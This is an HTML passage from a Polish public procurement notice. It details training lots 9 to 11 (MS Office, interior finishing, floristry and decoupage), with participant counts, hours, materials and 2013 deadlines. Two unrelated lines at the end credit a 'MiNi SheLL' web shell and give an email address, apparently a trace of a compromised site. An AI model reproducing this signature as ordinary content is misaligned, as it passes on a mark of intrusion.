<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenie w zakresie obsługa komputera dla początkujących z pakietem biurowym MS OFFICE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 12 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 12 osób. Szkolenie musi obejmować 160 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 20 godzin zajęć teoretycznych, 140 godzin zajęć praktycznych. Część praktyczna w ramach każdej edycji szkolenia musi obejmować zajęcia z zakresu obsługi komputera z pakietem biurowym MS OFFICE w łącznym wymiarze 140 godzin zegarowych.
Podczas zajęć praktycznych z zakresu obsługi komputera przy jednym stanowisku komputerowym wyposażonym w komputer wraz z pełnym oprogramowaniem musi pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Szkolenie w zakresie instalator wykończenia wnętrz - 
kurs ogólnobudowlany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 6 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 6 osób. Szkolenie musi obejmować 200 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 30 godzin zajęć teoretycznych, 170 godzin zajęć praktycznych. Część praktyczna szkolenia będzie obejmować zajęcia praktyczne w wymiarze 170 godzin zegarowych zajęć praktycznych, które zostaną przeprowadzone 
we własnych lub wynajętych warsztatach wyposażonych w narzędzia, urządzenia techniczne, materiały i produkty umożliwiające wykonywanie czynności praktycznych oraz na terenie obiektu budowlanego. Wykonawca na okres trwania szkolenia winien zapewnić uczestnikom szkolenia narzędzia i przyrządy budowlane (komplet winien zawierać co najmniej: drabinę, pędzel, wałek, sito i naczynie do farb, kielnię, packę tynkarską i inne) oraz materiały budowlane potrzebne do realizacji zajęć praktycznych (komplet winien zawierać co najmniej cement, piasek, wapno, gips, cegły, ościeżnicę, glazurę podłogową i ścienną, farby, tapety i inne).
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Szkolenie w zakresie bukieciarstwo z elementami florystyki i sztuki dekorowania domu oraz technikami zdobienia decoupage.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będą objęte 3 osoby, przy czym Zamawiający zastrzega sobie prawo do:
zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 3 osoby. Szkolenie musi obejmować 160 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 20 godzin zajęć teoretycznych, 140 godzin zajęć praktycznych. Podczas zajęć praktycznych z zakresu bukieciarstwa, florystyki, sztuki dekorowania domu i decoupage w wymiarze 134 godzin zegarowych,  Wykonawca winien zapewnić każdemu uczestnikowi szkolenia materiały w ilościach gwarantujących odpowiedni poziom szkolenia, w tym: kwiaty cięte żywe, kwiaty cięte sztuczne, materiał zielony żywy, materiał zielony sztuczny, gałązki igliwia świeże i sztuczne (średnie), kwiaty i różnorodne rośliny suche, gąbki florystyczne do układania kwiatów żywych i sztucznych, naczynia (wiklina, szkło, ceramika, drewno, metal), pudełka różnej wielkości, ozdobny papier do pakowania prezentów, dodatki florystyczne różnego rodzaju, takie jak wstążki, brokaty, taśmy dekoracyjne, kolorowe tiule, organzy, folie, fizeliny, bibuły, szyszki, bombki i szarfy, nabłyszczasz do roślin, siatki, druty florystyczne, szpilki dekoracyjne, statyw do bukietu ślubnego, konstrukcja pod kompozycje okolicznościowe, papier ryżowy z nadrukiem, serwetki z nadrukiem, papier ścierny zróżnicowanej gramatury, farby akrylowe w różnych kolorach, rozpuszczalniki, kleje do decoupage, lakiery do spękań, podkłady gruntujące, przedmioty do zdobienia styropianu (średniej wielkości), przedmioty do zdobienia z drewna (średniej wielkości), przedmioty do zdobienia z plastiku/akrylu (średniej wielkości), przedmioty do zdobienia ze szkła (średniej wielkości), przedmioty 
do zdobienia z metalu (średniej wielkości), zestaw pędzli do decoupage (płaski 
do naklejania motywów, płaski do malowania - duży, średni i mały, okrągły 
do cieniowania - średni i mały, okrągły bardzo mały do domalowywania elementów wykończeniowych, pędzel gąbkowy lub gąbka), mata do wycinania, pojemniki na farbę, nożyczki do wycinania (większe i mniejsze zakrzywione), inne niezbędne materiały florystyczne i materiały do decoupage). Podczas zajęć praktycznych z zakresu obsługi kas fiskalnych w wymiarze 6 godzin zegarowych przy jednym stanowisku kasowym musi pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2013.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com